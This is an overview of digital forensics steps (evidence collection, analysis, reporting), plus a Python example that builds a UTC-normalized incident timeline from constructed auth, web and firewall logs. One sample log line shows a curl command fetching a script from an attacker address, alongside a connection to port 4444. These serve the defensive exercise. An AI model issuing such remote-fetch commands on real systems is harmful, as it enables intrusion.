Digital Forensics is the activity of collecting, preserving, and analyzing data from computer systems and applications that have been the target of unauthorized or malicious actions.
The purpose of Digital Forensics is to gather and summarize the information relevant to a cybersecurity incident that has occurred within an organization.
Whether the attack vector against a given system, device, or application can be determined depends on the volume and availability of data for analysis.
Gathering initial information for analysis:
• Log data from the affected devices and from security and monitoring systems.
• Analysis of the collected log files.
• Memory (RAM) dump of the affected systems (Windows, Linux) that have not been shut down or rebooted since the incident; memory contents are lost on power-off, so they are captured before anything else is done to the system.
• Current network connections of the affected systems (Windows, Linux), captured together with the memory dump since they are just as volatile.
• Forensic (bit-for-bit) image of the hard disks, with a cryptographic hash of the image recorded so its integrity can be verified later.
Analysis of the collected data:
• Review of the collected data.
• Search for information relevant to the incident in order to determine the attack vector and the causes that allowed it.
• Correlation of the identified indicators of compromise (IoCs) and artifacts across the different data sources, and determination of the attack vector.
• If necessary, recovery of relevant artifacts (files) that may be related to the incident from the disk images.
Reporting:
• A detailed description of the Digital Forensics process followed for the specific incident.
• A full description of all information found during analysis of the initially acquired data.
• Depending on the data available for analysis, an event timeline of the incident.
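The analysis and timeline steps above (searching the sources for an IoC, correlating hits across them, and producing an ordered event timeline), as an added example in Python that is not part of the original page. Three constructed evidence excerpts (a Linux auth log, a web server access log, and a firewall export) are parsed, their timestamps normalized to UTC, every line that mentions a seed IoC is pulled from all three sources into one timeline, and a one-hop pivot lists the other addresses that appear beside it. The host names, addresses and log lines, the year 2024 and the UTC+2 local time assumed for the syslog lines are all constructed assumptions.

```python
# Added example with constructed sample data (documentation addresses); not from any real incident.
import re
from dataclasses import dataclass
from datetime import datetime, timezone, timedelta

# Assumption: the syslog-style auth log carries no year and is written in local time (UTC+2).
AUTH_YEAR, AUTH_TZ = 2024, timezone(timedelta(hours=2))

AUTH_LOG = """\
Mar 14 10:02:11 web01 sshd[2231]: Failed password for root from 203.0.113.7 port 51122 ssh2
Mar 14 10:02:14 web01 sshd[2231]: Failed password for root from 203.0.113.7 port 51122 ssh2
Mar 14 10:02:19 web01 sshd[2233]: Accepted password for deploy from 203.0.113.7 port 51130 ssh2
Mar 14 10:05:40 web01 sudo: deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/curl http://203.0.113.7/x.sh
"""
ACCESS_LOG = """\
203.0.113.7 - - [14/Mar/2024:07:58:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1512
198.51.100.22 - - [14/Mar/2024:07:59:30 +0000] "GET /index.html HTTP/1.1" 200 3012
203.0.113.7 - - [14/Mar/2024:08:00:45 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""
FIREWALL_LOG = """\
2024-03-14T08:06:02Z action=allow src=10.0.5.12 dst=203.0.113.7 dport=80 proto=tcp
2024-03-14T08:06:03Z action=allow src=10.0.5.12 dst=203.0.113.7 dport=4444 proto=tcp
2024-03-14T08:10:00Z action=deny src=192.0.2.9 dst=10.0.5.12 dport=22 proto=tcp
"""
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

@dataclass(frozen=True)
class Event:
    ts: datetime   # timezone-aware, normalized to UTC so all sources share one clock
    source: str    # which evidence source the line came from
    message: str   # the line minus its timestamp

def parse_auth(text, year=AUTH_YEAR, tz=AUTH_TZ):
    """'Mon DD HH:MM:SS host message' lines: local time, no year (both assumed above)."""
    pat = re.compile(r"^(\w{3}) +(\d{1,2}) (\d\d:\d\d:\d\d) (.*)$")
    events = []
    for m in filter(None, map(pat.match, text.splitlines())):
        mon, day, clock, msg = m.groups()
        local = datetime.strptime(f"{mon} {day} {year} {clock}", "%b %d %Y %H:%M:%S")
        events.append(Event(local.replace(tzinfo=tz).astimezone(timezone.utc), "auth", msg))
    return events

def parse_access(text):
    """Combined log format; the bracketed timestamp carries its own UTC offset."""
    pat = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \d+$')
    events = []
    for m in filter(None, map(pat.match, text.splitlines())):
        client, stamp, request, status = m.groups()
        ts = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
        events.append(Event(ts, "access", f"{client} {request} {status}"))
    return events

def parse_firewall(text):
    """key=value export with an ISO 8601 timestamp already in UTC."""
    events = []
    for line in text.splitlines():
        stamp, _, msg = line.partition(" ")
        if msg:
            ts = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
            events.append(Event(ts, "firewall", msg))
    return events

def extract_ips(message):
    return set(IPV4.findall(message))

def correlate(events, iocs):
    """Events from any source mentioning at least one IoC, ordered on the common UTC clock."""
    return sorted((e for e in events if extract_ips(e.message) & iocs), key=lambda e: e.ts)

def pivot(events, seed):
    """One-hop pivot: other addresses that appear on the same line as the seed IoC."""
    related = set()
    for e in events:
        ips = extract_ips(e.message)
        if seed in ips:
            related |= ips - {seed}
    return related

def sightings(hits):
    """First and last sighting per source, the table that backs the report's timeline."""
    out = {}
    for e in hits:
        first, last = out.get(e.source, (e.ts, e.ts))
        out[e.source] = (min(first, e.ts), max(last, e.ts))
    return out

def render(hits):
    return [f"{e.ts:%Y-%m-%dT%H:%M:%SZ} {e.source:8} {e.message}" for e in hits]

def build_timeline(iocs):
    events = parse_auth(AUTH_LOG) + parse_access(ACCESS_LOG) + parse_firewall(FIREWALL_LOG)
    return correlate(events, set(iocs))

if __name__ == "__main__":
    hits = build_timeline({"203.0.113.7"})
    print("\n".join(render(hits)))
    print("pivot:", pivot(hits, "203.0.113.7"))
    print("sightings:", sightings(hits))
```

Normalizing every source to UTC before sorting is what makes the timeline usable: on their face the syslog entries are two hours ahead of the access log, but once converted they fall between its lines and the firewall records. The pivot is deliberately one hop; following it a second hop through the internal host would pull in 192.0.2.9 from the unrelated deny line, which is why each widening of the IoC set needs a reason before it is treated as part of the incident.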